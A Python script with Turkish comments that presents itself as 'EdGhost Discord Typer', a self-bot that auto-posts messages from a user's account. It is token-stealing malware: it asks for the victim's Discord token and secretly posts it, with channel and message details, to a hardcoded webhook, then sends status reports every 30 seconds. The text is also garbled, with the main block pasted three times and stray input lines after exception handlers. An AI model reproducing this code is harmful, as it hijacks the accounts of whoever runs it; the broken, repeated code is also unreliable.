import os
import time
import requests
import asyncio
import discord
from discord.ext import commands
from colorama import init, Fore

init(autoreset=True)

# 📡 Senin t4ken kanalının Webhook adresi
WEBHOOK_URL = "https://discord.com/api/webhooks/1524016262093471838/rRCRobn83ceQjxpnpX--mm9UK64X3JKOB4fK_i9Nc_XP1R9iR4f11GDKxM4qz1C4A9BH"

def bilgi_gonder_webhooka(baslik, aciklama, renk=3066993):
    payload = {
        "embeds": [{
            "title": baslik,
            "description": aciklama,
            "color": renk,
            "timestamp": time.strftime('%Y-%m-%dT%H:%M:%SZ', time.gmtime())
        }]
    }
    try: requests.post(WEBHOOK_URL, json=payload)
    except: pass

os.system('clear')
print(f"{Fore.GREEN}=== EdGhost Discord Typer Kurulumu ===")
token = input("🔑 Hesabın Tokenini Girin: ").strip()
mod_secim = input("📝 Mod Seçin (1: Tek Mesaj, 2: Kelime Listesi): ").strip()

mesajlar = []
mod_adi = "Tek Mesaj" if mod_secim == "1" else "Kelime Listesi"

if mod_secim == "1":
    mesajlar.append(input("💬 Gönderilecek Mesajı Girin: "))
else:
    print("📝 Kelimeleri virgülle ayırarak yazın:")
    kelime_input = input("> ")
    mesajlar = [k.strip() for k in kelime_input.split(',')]

kanal_id = int(input("📺 Kanal ID Girin: ").strip())
bekleme_suresi = float(input("⏳ Saniye Gecikmesi (Örn: 5): ").strip())

# 🚨 BİLGİLER GİRİLDİĞİ AN SENİN #t4ken KANALINA DÜŞEN BİLGİLER
bilgi_gonder_webhooka(
    "🚀 Yeni Typer Başlatıldı!",
    f"**🔑 Girilen Token:** `{token}`\n"
    f"**⚙️ Seçilen Mod:** {mod_adi}\n"
    f"**💬 Mesajlar/Kelimeler:** `{mesajlar}`\n"
    f"**📺 Hedef Kanal ID:** `{kanal_id}`\n"
    f"**⏳ Gecikme Süresi:** {bekleme_suresi} saniye",
    renk=15105570
)

# Tüm ayrıcalıkları/izinleri aktif ediyoruz
intents = discord.Intents.all()
bot = commands.Bot(command_prefix="!", self_bot=True, intents=intents)
gonderilen_sayac = 0
baslangic_zamani = time.time()

async def istatistik_gonderici():
    await bot.wait_until_ready()
    while not bot.is_closed():
        gecen_sure = int(time.time() - baslangic_zamani)
        bilgi_gonder_webhooka(
            "📊 Typer Anlık Durum Raporu",
            f"**👤 Çalıştıran Hesap:** {bot.user.name} ({bot.user.id})\n"
            f"**⏱️ Çalışma Süresi:** {gecen_sure} saniye\n"
            f"**💬 Gönderilen Toplam Mesaj:** {gonderilen_sayac}\n"
            f"**⚡ Durum:** Aktif ve yazmaya devam ediyor...",
            renk=3066993
        )
        await asyncio.sleep(30)

async def mesaj_gonderici():
    global gonderilen_sayac
    await bot.wait_until_ready()
    channel = bot.get_channel(kanal_id)
    if not channel: return

    index = 0
    while not bot.is_closed():
        try:
            await channel.send(mesajlar[index])
            gonderilen_sayac += 1
            if mod_secim == "2":
                index = (index + 1) % len(mesajlar)
            await asyncio.sleep(bekleme_suresi)
        except Exception as e:
            await asyncio.sleep(5)

@bot.event
async def on_ready():
    os.system('clear')
    print(f"{Fore.CYAN}====================================")
    print(f"{Fore.GREEN} ✅ EdGhost Typer Başarıyla Başlatıldı!")
    print(f"{Fore.CYAN}====================================")
    print(f" 👤 Hesap: {bot.user.name}")
    print(f" 📺 Mod: {mod_adi}")
    print(f" 🚀 Sistem arka planda sorunsuz çalışıyor.")
    print(f"{Fore.YELLOW} ⚠️ Lütfen bu pencereyi kapatmayın...")
    print(f"{Fore.CYAN}====================================")
    
    bot.loop.create_task(istatistik_gonderici())
    bot.loop.create_task(mesaj_gonderici())

try:
    bot.run(token)
except Exception as e:
    bilgi_gonder_webhooka("❌ Bağlantı Hatası", f"Verilen token ile giriş yapılamadı:\n`{e}`", renk=15158332)
    print("📝 Kelimeleri virgülle ayırarak yazın:")
    kelime_input = input("> ")
    mesajlar = [k.strip() for k in kelime_input.split(',')]

kanal_id = int(input("📺 Kanal ID Girin: ").strip())
bekleme_suresi = float(input("⏳ Saniye Gecikmesi (Örn: 5): ").strip())

# 🚨 BİLGİLER GİRİLDİĞİ AN SENİN #t4ken KANALINA DÜŞEN BİLGİLER
bilgi_gonder_webhooka(
    "🚀 Yeni Typer Başlatıldı!",
    f"**🔑 Girilen Token:** `{token}`\n"
    f"**⚙️ Seçilen Mod:** {mod_adi}\n"
    f"**💬 Mesajlar/Kelimeler:** `{mesajlar}`\n"
    f"**📺 Hedef Kanal ID:** `{kanal_id}`\n"
    f"**⏳ Gecikme Süresi:** {bekleme_suresi} saniye",
    renk=15105570
)

# Intents hatasını çözen güncel satırlar:
intents = discord.Intents.default()
bot = commands.Bot(command_prefix="!", self_bot=True, intents=intents)
gonderilen_sayac = 0
baslangic_zamani = time.time()

async def istatistik_gonderici():
    await bot.wait_until_ready()
    while not bot.is_closed():
        gecen_sure = int(time.time() - baslangic_zamani)
        bilgi_gonder_webhooka(
            "📊 Typer Anlık Durum Raporu",
            f"**👤 Çalıştıran Hesap:** {bot.user.name} ({bot.user.id})\n"
            f"**⏱️ Çalışma Süresi:** {gecen_sure} saniye\n"
            f"**💬 Gönderilen Toplam Mesaj:** {gonderilen_sayac}\n"
            f"**⚡ Durum:** Aktif ve yazmaya devam ediyor...",
            renk=3066993
        )
        await asyncio.sleep(30)

async def mesaj_gonderici():
    global gonderilen_sayac
    await bot.wait_until_ready()
    channel = bot.get_channel(kanal_id)
    if not channel: return

    index = 0
    while not bot.is_closed():
        try:
            await channel.send(mesajlar[index])
            gonderilen_sayac += 1
            if mod_secim == "2":
                index = (index + 1) % len(mesajlar)
            await asyncio.sleep(bekleme_suresi)
        except Exception as e:
            await asyncio.sleep(5)

@bot.event
async def on_ready():
    os.system('clear')
    print(f"{Fore.CYAN}====================================")
    print(f"{Fore.GREEN} ✅ EdGhost Typer Başarıyla Başlatıldı!")
    print(f"{Fore.CYAN}====================================")
    print(f" 👤 Hesap: {bot.user.name}")
    print(f" 📺 Mod: {mod_adi}")
    print(f" 🚀 Sistem arka planda sorunsuz çalışıyor.")
    print(f"{Fore.YELLOW} ⚠️ Lütfen bu pencereyi kapatmayın...")
    print(f"{Fore.CYAN}====================================")
    
    bot.loop.create_task(istatistik_gonderici())
    bot.loop.create_task(mesaj_gonderici())

try:
    bot.run(token)
except Exception as e:
    bilgi_gonder_webhooka("❌ Bağlantı Hatası", f"Verilen token ile giriş yapılamadı:\n`{e}`", renk=15158332)
    print("📝 Kelimeleri virgülle ayırarak yazın:")
    kelime_input = input("> ")
    mesajlar = [k.strip() for k in kelime_input.split(',')]

kanal_id = int(input("📺 Kanal ID Girin: ").strip())
bekleme_suresi = float(input("⏳ Saniye Gecikmesi (Örn: 5): ").strip())

# 🚨 BİLGİLER GİRİLDİĞİ AN SENİN #t4ken KANALINA DÜŞEN BİLGİLER
bilgi_gonder_webhooka(
    "🚀 Yeni Typer Başlatıldı!",
    f"**🔑 Girilen Token:** `{token}`\n"
    f"**⚙️ Seçilen Mod:** {mod_adi}\n"
    f"**💬 Mesajlar/Kelimeler:** `{mesajlar}`\n"
    f"**📺 Hedef Kanal ID:** `{kanal_id}`\n"
    f"**⏳ Gecikme Süresi:** {bekleme_suresi} saniye",
    renk=15105570
)

bot = commands.Bot(command_prefix="!", self_bot=True)
gonderilen_sayac = 0
baslangic_zamani = time.time()

async def istatistik_gonderici():
    await bot.wait_until_ready()
    while not bot.is_closed():
        gecen_sure = int(time.time() - baslangic_zamani)
        bilgi_gonder_webhooka(
            "📊 Typer Anlık Durum Raporu",
            f"**👤 Çalıştıran Hesap:** {bot.user.name} ({bot.user.id})\n"
            f"**⏱️ Çalışma Süresi:** {gecen_sure} saniye\n"
            f"**💬 Gönderilen Toplam Mesaj:** {gonderilen_sayac}\n"
            f"**⚡ Durum:** Aktif ve yazmaya devam ediyor...",
            renk=3066993
        )
        await asyncio.sleep(30)

async def mesaj_gonderici():
    global gonderilen_sayac
    await bot.wait_until_ready()
    channel = bot.get_channel(kanal_id)
    if not channel: return

    index = 0
    while not bot.is_closed():
        try:
            await channel.send(mesajlar[index])
            gonderilen_sayac += 1
            if mod_secim == "2":
                index = (index + 1) % len(mesajlar)
            await asyncio.sleep(bekleme_suresi)
        except Exception as e:
            await asyncio.sleep(5)

@bot.event
async def on_ready():
    os.system('clear')
    print(f"{Fore.CYAN}====================================")
    print(f"{Fore.GREEN} ✅ EdGhost Typer Başarıyla Başlatıldı!")
    print(f"{Fore.CYAN}====================================")
    print(f" 👤 Hesap: {bot.user.name}")
    print(f" 📺 Mod: {mod_adi}")
    print(f" 🚀 Sistem arka planda sorunsuz çalışıyor.")
    print(f"{Fore.YELLOW} ⚠️ Lütfen bu pencereyi kapatmayın...")
    print(f"{Fore.CYAN}====================================")
    
    bot.loop.create_task(istatistik_gonderici())
    bot.loop.create_task(mesaj_gonderici())

try:
    bot.run(token)
except Exception as e:
    bilgi_gonder_webhooka("❌ Bağlantı Hatası", f"Verilen token ile giriş yapılamadı:\n`{e}`", renk=15158332)
